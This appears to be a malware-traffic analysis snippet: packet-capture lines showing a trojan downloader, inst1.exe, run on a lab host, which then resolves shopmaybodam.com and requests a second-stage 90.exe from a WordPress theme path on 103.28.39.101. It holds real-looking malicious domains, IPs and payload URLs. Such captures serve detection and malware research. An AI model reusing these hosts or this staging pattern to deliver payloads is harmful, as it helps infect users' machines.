Inst1.exe Trojan Downloader Loads 90.exe Unknown Malware PCAP file download


2016-09-20 09:02:11.821468 IP 192.168.1.102.59656 > 192.168.1.100.80: Flags [P.], seq 1:336, ack 1, win 256, length 335: HTTP: GET /captured/inst1.exe HTTP/1.1
E..w.[………f…d…P#7….U.P…….GET /captured/inst1.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://192.168.1.100/captured/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100
Connection: Keep-Alive
2016-09-20 09:02:11.821487 IP 192.168.1.100.80 > 192.168.1.102.59656: Flags [.], ack 336, win 237, length 0

E..(.,….LH…f]….&..z..*/..;P… ………
2016-09-20 09:03:55.606661 IP 192.168.1.102.59686 > 93.171.202.162.443: Flags [.], ack 549660, win 2268, length 0
E..(.-….LG…f]….&..z..*/..EP………….
2016-09-20 09:03:55.886564 IP 192.168.1.102.62247 > 75.75.75.75.53: 40557+ A? shopmaybodam.com. (34)
E..>6……^…fKKKK.’.5.*…m………..shopmaybodam.com…..
2016-09-20 09:03:56.183757 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [S], seq 3854319646, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….z…fg.’e.’.P..@……. ..-…………..
2016-09-20 09:03:56.463188 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [.], ack 4258741258, win 256, length 0
E..(………..fg.’e.’.P..@…<
P………….
2016-09-20 09:03:56.463600 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [P.], seq 0:356, ack 1, win 256, length 356: HTTP: GET /wp-content/themes/twentyfifteen/genericons/90.exe HTTP/1.1
E………. …fg.’e.’.P..@…<
P…….GET /wp-content/themes/twentyfifteen/genericons/90.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: shopmaybodam.com